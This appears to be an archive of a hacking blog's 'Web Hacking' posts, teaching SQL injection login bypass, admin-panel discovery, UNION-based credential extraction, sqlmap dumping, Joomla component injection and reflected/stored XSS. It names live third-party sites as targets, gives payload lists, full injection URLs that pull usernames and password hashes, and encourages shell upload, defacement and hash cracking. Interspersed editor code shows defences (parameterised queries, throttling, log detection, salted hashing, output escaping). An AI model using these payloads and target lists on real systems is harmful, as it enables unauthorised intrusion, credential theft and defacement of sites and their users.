Showing posts with label Web Hacking.

Monday, 2 March 2015

Demo Of Basic SQL injection for website hacking



You might have seen hackers hacking and defacing websites, editing them with their own content, making posts on them and so on. There are many ways of doing this; in this tutorial I will be showing you a very basic and simple SQLi (Structured Query Language injection). I will show you how to find a website's admin panel with a simple Google dork and how to use a SQL query to bypass the admin username and password check and get into the panel. Once you are in the panel, find an upload option, upload your shell, then deface the site.

Dorks:
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php

# Try to make your own dorks also to get more success rate.

Hundreds of sites will come up with /adminlogin.aspx in their URL. Pick any of them and you will land on the page where the admins log in. Fill in the details as:
User: 1'or'1'='1
Password: 1'or'1'='1

Use the login details above and you will be in the website's admin panel. It will not work on every website you find, but it will work on many of them.

Some websites I found:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx



Other injection queries:
' or 1=1 --
1'or'1'='1
admin'--
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"=")
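The bypass above works because the login page builds its SQL by pasting the submitted username and password straight into the query text, so the quotes in 1'or'1'='1 become SQL syntax. The following added Python example (editor's code, not from the original post) shows that vulnerable construction beside a parameterised version, runs two payloads from the list above against both using an in-memory SQLite database with constructed rows, and goes one step beyond the post by also showing the integer-id case (products.php?prodid=...) used in the later tutorials. Table and column names, the sample credentials and the product row are all made up for the demo.

```python
import sqlite3

# Constructed in-memory schema and rows for the demo (not data from any real site).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'correct horse battery staple');
        CREATE TABLE products (prodid INTEGER, name TEXT);
        INSERT INTO products VALUES (7, 'Basil');
    """)
    return conn

def login_vulnerable(conn, user, password):
    # String concatenation: quotes inside the submitted value become SQL syntax,
    # so 1'or'1'='1 turns the WHERE clause into a tautology and admin'-- comments
    # the password check away. (Plain-text passwords only to keep the demo short.)
    sql = ("SELECT username FROM users WHERE username = '" + user
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, user, password):
    # Parameterised query: the values travel separately from the SQL text, so a
    # quote inside a value can never close the string literal.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (user, password)).fetchone()
    return row[0] if row else None

def product_safe(conn, prodid_str):
    # Integer parameters: reject anything that is not a whole number before it
    # reaches the database, and still bind the value as a parameter.
    try:
        prodid = int(prodid_str)
    except ValueError:
        return None   # generic "not found"; never echo the raw database error text
    row = conn.execute("SELECT name FROM products WHERE prodid = ?", (prodid,)).fetchone()
    return row[0] if row else None

BYPASS_PAYLOADS = ["1'or'1'='1", "admin'--"]   # two values from the list above

def demo():
    conn = make_db()
    return {
        "vulnerable": [login_vulnerable(conn, p, p) for p in BYPASS_PAYLOADS],
        "safe": [login_safe(conn, p, p) for p in BYPASS_PAYLOADS],
        "safe_real_login": login_safe(conn, "admin", "correct horse battery staple"),
        "product_probe": product_safe(conn, "7' or 1=0--"),
        "product_real": product_safe(conn, "7"),
    }

if __name__ == "__main__":
    print(demo())
```

The vulnerable function returns "admin" for both payloads without the password ever being known; the parameterised one returns None for them and "admin" only for the real credentials. Note that the fix is binding the values, not filtering quotes: a blocklist of characters is exactly the kind of "sanitisation" the payload list above is written to get around.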

Top 7 ways For Finding Admin PAnel OF Any website

I see many people having problems while hacking a website: they say they got the data but are unable to find the admin panel. So today I will be sharing the tricks that are commonly used for finding the admin panel of a website.

Method 1: Adding to the URL

This is the first and easiest method of finding the admin login page. You can add some words after the URL, like:

http://www.site.com/admin
http://www.site.com/administrator
http://www.site.com/login
http://www.site.com/wp-login.php
http://www.site.com/admin.php

Method 2: Using various scripts

You can use various scripts, such as the many admin finders, to get the admin page. Here I am showing you a useful script which will help you find the admin page. (I will release my own admin finder script soon and update this post.)
To run this script you first need to install ActivePerl; get it from

http://www.activestate.com/activeperl/downloads

Now copy the code from http://pastebin.com/WWZszURW, save it as anything.pl and run the script to get the login page of the desired site. (Remember, it's a Python script.)

Method 3: Crawling software

You can use various crawling tools to crawl the website and get the login page. These tools crawl all the pages of the website and show a list of all its pages and directories.

Method 4: Search-engine crawling and robots.txt

By default search engines crawl the entire site, and with robots.txt the site owner gives a list of links that are not to be crawled by the engine. Most of the time the admin asks the engine not to crawl the admin page, so if you view robots.txt you can get the link to the login page:
http://www.site.com/robots.txt

Method 5: Google dorks

Google dorks are sometimes very useful if you know how to use them properly, so here are some examples of useful Google dorks that will definitely help you in finding the admin login panel of a website.

site:site.com "admin"
site:site.com inurl:login
site:site.com intitle:"admin login"

Method 6: Using an online admin finder/scanner

There are many such online admin finders available, but I am giving you the link to one of my favourites. This site, http://sc0rpion.ir/af/, will help you find the admin login page online.

Method 7: Havij tool

Lastly, you can use the ever-popular Havij to find the admin page. Click on the Havij link to learn more; I have already written a nice post on it.
COUNTERMEASURES BY ADMIN
From this post it becomes very clear that if you (site owners) have not changed the default URL of your site's login page, it can easily be compromised if an attacker gets the username and password, or even brute-forces them. So it is advised that you change the default URL of your login page to something uncommon that is hard to guess, for example:

http://www.site.com/glass.php
http://www.site.com/myway.php
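The countermeasure above only moves the login page; the post itself notes that an attacker who finds it can still brute-force it. The added Python example below (editor's code, not part of the original post) is a sliding-window lockout that refuses further attempts for a (client IP, username) pair after a number of failures inside a time window, which is the control that actually blunts password guessing. The class name, the thresholds, the IP address and the timeline are all constructed for the demo; a real deployment would persist the counters in a shared store and add a per-account limit as well, since a distributed attacker can rotate source addresses.

```python
from collections import defaultdict, deque

class LoginThrottle:
    """Sliding-window failure counter keyed by (client IP, lower-cased username).

    After `max_failures` failed attempts within `window_seconds`, further
    attempts for that key are refused until enough old failures expire.
    Timestamps are passed in explicitly so the behaviour is deterministic.
    """

    def __init__(self, max_failures=5, window_seconds=300):
        self.max_failures = max_failures
        self.window = window_seconds
        self._failures = defaultdict(deque)   # key -> timestamps of failures

    def _key(self, ip, username):
        return (ip, username.lower())

    def _prune(self, key, now):
        q = self._failures[key]
        while q and now - q[0] >= self.window:
            q.popleft()                       # drop failures older than the window

    def is_locked(self, ip, username, now):
        key = self._key(ip, username)
        self._prune(key, now)
        return len(self._failures[key]) >= self.max_failures

    def record_failure(self, ip, username, now):
        key = self._key(ip, username)
        self._prune(key, now)
        self._failures[key].append(now)

    def record_success(self, ip, username):
        self._failures.pop(self._key(ip, username), None)

def simulate():
    """Constructed scenario: six wrong guesses for 'admin', ten seconds apart."""
    t = LoginThrottle(max_failures=5, window_seconds=300)
    ip, user = "198.51.100.7", "admin"        # documentation-range address, made up
    timeline = []
    for i in range(6):
        now = i * 10
        if t.is_locked(ip, user, now):
            timeline.append((now, "locked"))
            continue
        t.record_failure(ip, user, now)       # the guess is checked and fails
        timeline.append((now, "failed"))
    other_user_ok = not t.is_locked(ip, "editor", 60)   # different key, unaffected
    unlocked_later = not t.is_locked(ip, user, 301)     # oldest failure has expired
    return timeline, other_user_ok, unlocked_later

if __name__ == "__main__":
    print(simulate())
```

The sixth attempt at t=50 is refused before the password is even checked, and the key unlocks again at t=301 when the failure from t=0 falls out of the window. Pair this with the renamed URL from the post rather than relying on either alone.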

SQL Hacking a Website

Website Hacking ~ SQL Injection 
Hello, today I'll be going over the steps of performing an SQL injection attack. I would like to state that I will be using a site I have already performed this attack on for the sake of this tutorial. I am not responsible for how you use what you have learned here, so let's get started.

The site I will be using: http://www.irwinhunter.com.au/

Step 1. The website
Okay so this website has been designed very poorly. It has a constant design color of green and some stupid navigation panel. It has multiple places such as "Products" and "Links". Overall this website is pretty shitty.

Step 2. Finding the vulnerability
Okay, before we are actually able to do this attack we need to find a vulnerability.
To do this we go to pages and click on other pages we find within the main page we clicked on; for this example I'll use "Products". Once you are in the "Products" section, click on a product group and then we can get to the fun part; I'll be using "Herbs" for this. After you choose your product group, click on a product within the category and you will be taken to the page for that product. To tell whether we have found a vulnerable page in the "Products" section, look at the website URL; it should have something like
Code:
products.php?prodid=<number>

If it does, then to find out whether it is vulnerable we need to append a ' or a piece of broken logic such as 1=0--
If done correctly the URL should look like
Code:
products.php?prodid=<number>' or 1=0--

If the site is vulnerable you should get an error like this.
Code:
Error performing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=0--' at line 1

Step 3. Exploiting the vulnerability
If you got this far you have obviously understood the first two steps, so let's move on. Once you have found your vulnerability we can exploit it to get some information that we shouldn't be able to get. First let's find out how many columns the page's query returns (we need this before we can get the table names) by typing the following into the website URL.
Code:
products.php?prodid=<number> order by 20--

For this website it should come up with an error that says
Code:
Error performing query: Unknown column '20' in 'order clause'

If it does, then we know our number is too big, so let's cut the number down to 15 and put it into the URL.
Code:
products.php?prodid=<number> order by 15--

Once again we should get the same error, but this time with the number 15. We now drop down five more to 10; if done correctly it should be
Code:
products.php?prodid=<number> order by 10--

We get the same error again, just with the number 10, so why not drop to 5?
Code:
products.php?prodid=<number> order by 5--

Holy shit, we no longer have an error! But we still need to find the maximum number we can go to in order to do this attack properly. I suggest you increment the number by 1 until you can no longer view the page and begin to get the error again.

Step 4. Finding the table names
If you have managed to follow all the steps properly you are now able to start getting the table and column names. For this section of the tutorial we will cover how to get the table names first.

Okay, so to get the name of what is known in SQL syntax as a "table" we need to add some more code to the URL bar. What we currently have after the product id needs to be deleted, and in its place we insert the following.
Code:
products.php?prodid=-<number> union select 1,2,3,4,5,6,7--

If done correctly you should see a number on your screen; this shows which column is displayed on the page and where we can put our own data. If this was not done correctly and you still see the normal page content, put a minus sign (-) in front of the product id.

Now to get the table names we need to format the URL string as follows.
Code:
products.php?prodid=-<number> union select 1,2,table_name,4,5,6,7 from information_schema.tables--

If done correctly you should see text such as
Code:
CHARACTER_SETS

You may now scroll through the tables and see what you would like; I want to get the admin login info, so I will use the "admin" table I found.

Step 5. Getting column names
Okay, to get the names of what is known in SQL syntax as a "column", all we need to do is go back to what we had in "Step 4" and change it to this.
Code:
products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns--

Once this is done you may look through for what you want and, as I said, I wanted the admin login. I will proceed to use the columns "login" and "password".

Step 6. Getting our login info
Okay, now to get the login info we wanted, we need to make sure that we wrote down the names we found; if we didn't, we need to look again. Since I wrote down the info I needed, I now know that what I need to use is below.
Code:
login, password, admin

Now you may be wondering how we use what we have obtained; well, it's simple. Just follow my instructions and you will have the admin info. To get the info we take the string we currently have, which should be
Code:
products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns

We need to replace "column_name" with "concat(login,0x3a,password)" and "information_schema.columns" with "admin". Once this is done it should look like this.
Code:
products.php?prodid=-<number> union select 1,2,concat(login,0x3a,password),4,5,6,7 from admin--

If you did this correctly the username and password should show up, and if so, this means you have followed this tutorial correctly and have performed a SQL injection attack.

SQLmap in BackTrack 5 Tutorial


Hello again guys,
today I'm going to show you how to hack a SQL-vulnerable site with SQLmap in BackTrack 5.
First of all, open BackTrack > Terminal, then type:
cd /pentest/database/sqlmap
and hit Enter.
Now we are inside the SQLmap directory; let's start hacking.

The options we will need here are:

-D <= define the database
-T <= define the table
-C <= define the column
--dbs <= list the database names
--tables <= list the table names
--columns <= list the column names
--dump <= dump the data out of the column



Let's start.

Our first command will be:
./sqlmap.py -u http://www.website.com/index.php?id=13 --dbs <= Example!
It will look like:


[Image: backtrack1.PNG]


then we will get the Databases names like:

[Image: backtrack2.PNG]


Now we will ask for the tables from any of those databases with --tables.
We have to select the database with "-D" and ask for the tables with "--tables",
so we will type:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name --tables
I chose the walnut_live database, so I typed:


[Image: backtrack3.PNG]


and the results will be the table names, of course.
It will look like:


[Image: backtrack4.PNG]


Now we have the tables and have found the users table!
Now we select this table with the "-T" option. We have already selected our database, so we write the same command but replace "--tables" with "-T table_name", which is the "users" table, and then ask for the columns inside that table with "--columns". It will be like
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name --columns
It will look like:


[Image: backtrack5.PNG]

Now we get the results, the columns.
They will come like this:


[Image: backtrack6.PNG]

As you can see we got the "id", "pass" and "user" columns.
Now we want the data from them, so we dump the data with "--dump",
but here we have two ways to get it:
we can dump all the data at once, or select a column and get the data from it.
I will show you what both look like and how they are used.

First, we can get all the data with this command:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name --dump
which will get us all the data at once and will look like this:


[Image: backtrack7.PNG]


and the result is:

[Image: backtrack8.PNG]


In the picture I marked the user and pass.
Now we will try getting them one by one with this command:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump
For example, I will get user:

User:

[Image: backtrack9.PNG]

Result:

[Image: user.PNG]

And so on for the rest of the data.
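The sequence in the "SQL Hacking a Website" post (a stray quote, then order by N--, then union select ... from information_schema) and the sqlmap run above both leave a recognisable trail in the web server's access log. The added Python example below (editor's code, not from either post) parses a few constructed combined-format log lines, URL-decodes the query string, tags the probing patterns the posts describe, counts 5xx responses (the stage where the error-based probes crash the query) and flags sqlmap's default User-Agent, which begins with sqlmap/ unless the tool is run with --random-agent. The log lines, IP addresses and signature names are constructed for this example; the patterns are a triage aid for log review, not a substitute for the parameterised queries that remove the bug.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" access-log format: client, identd, user, [time], "request", status, size, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Signatures for the probing steps described in the posts, matched on the decoded query string.
SIGNATURES = [
    ("quote_boolean",      re.compile(r"""['"]\s*(?:or|and)\b""", re.I)),      # ' or ...
    ("numeric_boolean",    re.compile(r"\b(?:or|and)\s+\d+\s*=\s*\d+", re.I)),  # or 1=0, AND 1=2
    ("order_by_probe",     re.compile(r"\border\s+by\s+\d+", re.I)),            # column counting
    ("union_select",       re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum",        re.compile(r"\binformation_schema\b", re.I)),
    ("comment_terminator", re.compile(r"--\s*$")),                              # trailing SQL comment
]
# sqlmap's default User-Agent starts with "sqlmap/"; it is a bonus signal only, since --random-agent hides it.
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)

# Constructed sample lines using documentation address ranges (not a real server's log).
SAMPLE_LOG = """\
203.0.113.5 - - [02/Mar/2015:10:01:02 +0000] "GET /products.php?prodid=7%27%20or%201=0-- HTTP/1.1" 500 512 "-" "Mozilla/5.0"
203.0.113.5 - - [02/Mar/2015:10:01:09 +0000] "GET /products.php?prodid=7%20order%20by%2020-- HTTP/1.1" 500 512 "-" "Mozilla/5.0"
203.0.113.5 - - [02/Mar/2015:10:01:15 +0000] "GET /products.php?prodid=-7%20union%20select%201,2,table_name,4,5,6,7%20from%20information_schema.tables-- HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.77 - - [02/Mar/2015:10:03:40 +0000] "GET /index.php?option=com_qpersonel&task=qpListele&katid=2+AND+1=2+UNION+SELECT+1,2,concat(username,0x3a,password)-- HTTP/1.1" 200 3072 "-" "Mozilla/5.0"
198.51.100.9 - - [02/Mar/2015:10:05:00 +0000] "GET /index.php?id=13 HTTP/1.1" 200 2048 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.0.2.44 - - [02/Mar/2015:10:06:00 +0000] "GET /products.php?prodid=12 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
""".splitlines()

def classify(target):
    """Return the signature names that match the decoded query string of a request target."""
    query = unquote_plus(target).partition("?")[2]   # decode %xx and '+' before matching
    return [name for name, rx in SIGNATURES if rx.search(query)]

def analyse(lines):
    """Map each client IP that showed a signal to {requests, tags, server_errors, sqlmap_ua}."""
    report = defaultdict(lambda: {"requests": 0, "tags": set(), "server_errors": 0, "sqlmap_ua": False})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                               # not combined format: skip rather than guess
        tags = classify(m["target"])
        sqlmap = bool(SQLMAP_UA.match(m["ua"]))
        if not tags and not sqlmap:
            continue
        entry = report[m["ip"]]
        if tags:
            entry["requests"] += 1
            entry["tags"].update(tags)
            if m["status"].startswith("5"):        # probe that broke the query: error-based stage
                entry["server_errors"] += 1
        entry["sqlmap_ua"] |= sqlmap
    return {ip: dict(v, tags=sorted(v["tags"])) for ip, v in report.items()}

if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(ip, info)
```

Three requests from 203.0.113.5 reproduce the whole manual walkthrough (quote, order by, union select against information_schema) with two 500s along the way; the Joomla-style request from 203.0.113.77 is caught by the plus-encoded AND 1=2 UNION SELECT; and 198.51.100.9 is reported only because of its User-Agent, which is why the UA check is kept separate from the query signatures. The unremarkable request from 192.0.2.44 is not reported at all.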

Joomla SQL Injection Tutorial


Probably the most common case for hacked Joomla websites is that a SQL injection vulnerability was exploited. A typical URL which is affected by this type of vulnerability looks like this:


index.php?option=com_blabla&category=5&Item=2

Typically the following parameters are vulnerable:


- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page


You can find out if a parameter is vulnerable when you change its value from, e.g., category=5 to category='. Press Enter and look for MySQL errors in the website. If you find one, you might have discovered a SQL injection vulnerability.

In order to give you a better understanding and feel for how vulnerable URLs might look, I will just show you some URLs which are known to be vulnerable (I discovered them):


URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id

URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid

URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid

URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid

URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID

URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid

URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id

URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp

Notice how many of these parameters look familiar? Yes, I mentioned them earlier as well-known parameters which are affected on a regular basis :)

Since every Joomla database has the same structure (the same tables etc.), we know enough to inject a SQL statement:


Example #1:

index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(username,password)--

Example #2:

index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,8,9,10,11,12--

Example #3:

index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+group_concat(0x503077337220743020743368206330777321,name,username,password,email,usertype,0x503077337220743020743368206330777321)--

The selected information will be shown within the website.
Select a username and password from the table and try to crack the MD5 hash with the help of rainbow tables.

SQL injections in Joomla give us as much freedom as we could want. You can select everything you want from the database, and if you are lucky there are also other tables in the database which do not belong to Joomla but still contain some very interesting information.
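The last step above depends on the stolen password column holding unsalted MD5 digests, which a precomputed table turns back into passwords. The added Python example below (editor's code, not from the original post) shows how an application should store passwords instead: PBKDF2-HMAC-SHA256 with a random per-user salt and a constant-time check, plus a verify-and-rehash path that replaces a legacy 32-hex MD5 record the next time its owner logs in, so a dumped table of the new records is not directly lookupable. The record format, the iteration count and the assumption that legacy rows are plain unsalted MD5 are choices made for this example, not Joomla's own storage format.

```python
import hashlib
import hmac
import os

ITERATIONS = 310_000   # PBKDF2-HMAC-SHA256 work factor; raise it as hardware gets faster

def hash_password(password, salt=None):
    """Return a self-describing record: algorithm$iterations$salt_hex$derived_key_hex."""
    salt = salt if salt is not None else os.urandom(16)   # fresh random salt per user
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def verify_password(password, record):
    parts = record.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iters))
    # constant-time comparison so the check does not leak how many bytes matched
    return hmac.compare_digest(dk.hex(), dk_hex)

def legacy_md5_record(password):
    # How an old, unsalted install stored it (constructed for the demo): the same
    # password always yields the same 32-hex digest, so one precomputed table
    # recovers every user who chose it, with no brute force at all.
    return hashlib.md5(password.encode("utf-8")).hexdigest()

def is_legacy_md5(record):
    return len(record) == 32 and all(c in "0123456789abcdef" for c in record.lower())

def upgrade_on_login(password, record):
    """Check the supplied password and return the record the application should keep.

    A legacy MD5 row is verified once and replaced by a PBKDF2 record, so the
    table migrates itself as users log in. Returns None on a wrong password.
    """
    if is_legacy_md5(record):
        if hmac.compare_digest(legacy_md5_record(password), record.lower()):
            return hash_password(password)     # rehash immediately while we have the clear text
        return None
    return record if verify_password(password, record) else None

if __name__ == "__main__":
    old = legacy_md5_record("secret123")
    new = upgrade_on_login("secret123", old)
    print(old, "->", new)
```

Two users with the same password now get different records because of the salt, and each guess against a dumped record costs the attacker ITERATIONS hash computations instead of one table lookup. The migration path matters because the dump in the post happens long after passwords were set; rehashing on login is the only point at which the clear text is available to convert.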

XSS Complete Tutorial Website Hacking

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

What is XSS?

Cross Site Scripting, also known as XSS, is one of the most common web application vulnerabilities. It allows an attacker to run his own client-side scripts (especially JavaScript) in web pages viewed by other users.

In a typical XSS attack, a hacker injects his malicious JavaScript code into a legitimate website. When a user visits the specially crafted link, the malicious JavaScript is executed. A successfully exploited XSS vulnerability allows attackers to mount phishing attacks, steal accounts and even build worms.


Example: Let us imagine a hacker has discovered an XSS vulnerability in Gmail and injects a malicious script. When a user visits the site, the malicious script executes. The malicious code can be used to redirect users to a fake Gmail page or to capture cookies. Using these stolen cookies, he can log in to your account and change the password.

It will be easy to understand XSS if you have the following prerequisites:
  • Strong knowledge of HTML and JavaScript (Reference).
  • Basic knowledge of HTTP client-server architecture (Reference)
  • [optional] Basic knowledge of server-side programming (PHP, ASP, JSP)

XSS Attack:
Step 1: Finding a vulnerable website
Hackers use Google dorks to find vulnerable sites, for instance "?search=" or ".php?q=". 1337 hackers target specific sites instead of using Google search. If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the vulnerability:
First of all, we have to find an input field so that we can inject our own script, for example a search box, username, password or any other input field.

[Image: search+box.jpg]

Test 1:
Once we have found the input field, let us try to put some string inside it; for instance let me input "BTS". It will display the result.
[Image: XSS_input.gif]

Now right-click on the page and select "View source". Search for the string "BTS" which we entered in the input field. Note the location where the input is placed.
[Image: BTS_XSS.gif]


Test 2:
Now we are going to check whether the server sanitizes our input or not. To do this, let us input the <script> tag inside the input field.
[Image: Xss_script_tag.gif]
View the source of the page. Find the location where the input was displayed in the previous test.
[Image: xss-SUCCESS_Noparsing.gif]

Thank god, our code is not being sanitized by the server and the code is the same as what we entered in the field. If the server sanitized our input, the code would look like this: &lt;script&gt;. This indicates that the website is vulnerable to XSS and we can execute our own scripts.

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS. But let us make sure the site is completely vulnerable to this attack by injecting a full piece of JavaScript. For instance, let us input
Code:
<script>alert('BTS')</script>
[Image: injecting-XSS.gif]

Now it will display a pop-up box with the string 'BTS'. Finally, we have successfully exploited the XSS. By extending the code with a malicious script, a hacker can steal cookies, deface the site and more.
[Image: alert-box-xss.gif]

Types of XSS based on persistence:
Based on persistence, we can categorize XSS attacks into two types, namely Persistent and Non-Persistent.

Persistent XSS:

A Persistent or Stored XSS attack occurs when the malicious code submitted by the attacker is saved by the server in the database, and is then permanently served as part of the normal page.

For example:
Many websites host a support forum where registered users can ask their questions by posting messages, which are stored in the database. Let us imagine an attacker posts a message containing malicious JavaScript code instead. If the server fails to sanitize the input provided, the injected script is executed. The code will run whenever a user tries to read the post. If the injected code is cookie-stealing code, it will steal the cookies of users who read the post. Using the cookie, the attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred to as Reflected XSS, is the most common type of XSS found nowadays. In this type of attack, the injected code is sent to the server in the HTTP request. The server embeds the input in the HTML and returns it (the HTTP response) to the browser. When the browser renders the HTML, it also executes the embedded script. This kind of XSS vulnerability frequently occurs in search fields.

Example:
Let us consider a project hosting website. To find our favourite project, we just input the related word in the search box. When the search finishes, it displays a message like "search results for yourword". If the server fails to sanitize the input properly, the injected script is executed.

In the case of reflected XSS attacks, the attacker sends the specially crafted link to victims and tricks them into clicking it. When the user clicks the link, the browser sends the injected code to the server, the server reflects the attack back to the user's browser, and the browser then executes the code.

In addition to these types, there is also a third type called DOM-based XSS; I will explain that attack in a later post.
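Both the stored and the reflected case above come down to the same defect: the server writes user-supplied text into the HTML without encoding it for the place it lands. The added Python example below (editor's code, not from the original post) renders the "search results for yourword" page described above in a vulnerable and an escaped form, runs the post's <script>alert('BTS')</script> probe through both, and shows the attribute-value context, where the escaped value must additionally sit inside quotes in the template. The template strings and helper names are constructed for the demo.

```python
import html

PROBE = "<script>alert('BTS')</script>"   # the probe string used in the post

def render_search_vulnerable(term):
    # Raw interpolation: whatever arrived in the query string is parsed as markup,
    # which is the "not being sanitized" outcome of Test 2 above.
    return f"<p>search results for {term}</p>"

def render_search_safe(term):
    # html.escape converts & < > " ' to entities, so the term is displayed as text
    # and the browser never sees a <script> tag. This is the &lt;script&gt; form
    # the post describes for a server that does encode its output.
    return f"<p>search results for {html.escape(term)}</p>"

def render_input_safe(term):
    # Attribute context: the value must sit inside quotes in the template AND be
    # escaped with quote=True (html.escape's default) so " and ' are encoded too;
    # an unquoted attribute would let a space end the value.
    return f'<input type="text" name="q" value="{html.escape(term, quote=True)}">'

def has_live_script_tag(markup):
    # Demo check: does an unescaped <script tag survive in the rendered output?
    return "<script" in markup.lower()

def demo():
    return {
        "vulnerable": has_live_script_tag(render_search_vulnerable(PROBE)),
        "safe": has_live_script_tag(render_search_safe(PROBE)),
        "safe_markup": render_search_safe(PROBE),
        "input_markup": render_input_safe(PROBE),
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=", v)
```

Escaping belongs at the point of output, chosen for the context the value lands in: the body-text encoding shown here is not sufficient inside a script block, a URL or an event-handler attribute, where a different encoding or a refusal to place user data at all is needed. Storing the raw text and escaping on render also keeps the stored-XSS case above covered, since the forum post is encoded every time it is displayed.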


What can an attacker do with this vulnerability?
  • Stealing identities and confidential data (credit card details).
  • Bypassing restrictions in websites.
  • Session hijacking (stealing sessions)
  • Malware attacks
  • Website defacement
  • Denial of service attacks (DoS)
